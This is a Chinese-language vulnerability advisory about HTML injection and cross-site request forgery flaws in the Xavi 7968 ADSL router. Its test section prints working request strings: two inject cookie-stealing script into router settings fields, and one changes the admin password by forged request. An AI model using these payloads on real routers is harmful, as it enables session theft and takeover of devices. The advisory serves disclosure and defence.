Xavi 7968 ADSL路由器多个远程安全漏洞

发布日期:2012-02-21
更新日期:2012-02-22

受影响系统:
Xavi 7968 ADSL Router
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52098

Xavi ADSL Router是一款ADSL路由器。

Xavi 7968 ADSL Router在实现上存在HTML注入和跨站请求伪造漏洞,攻击者可利用此漏洞执行任意脚本代码、窃取Cookie验证凭证或执行某些管理操作。

<*来源:Busindre
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&amp;confirm=+Apply+

?ip_add_txtbox=www.example2.com&amp;sub_mask_txtbox=255.255.255.0&amp;host_name_txtbox=Hack&lt;SCRIPT&gt;alert(document.cookie)&lt;/script&gt;&amp;domain_name_txtbox=local.lan&amp;mtu_txtbox=1500&amp;next=Apply

?sySUSErName=1234&amp;sysPassword=12345&amp;sysCfmPwd=12345&amp;cmdSubmit=Apply

建议:
--------------------------------------------------------------------------------
厂商补丁:

Xavi
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwddjf.html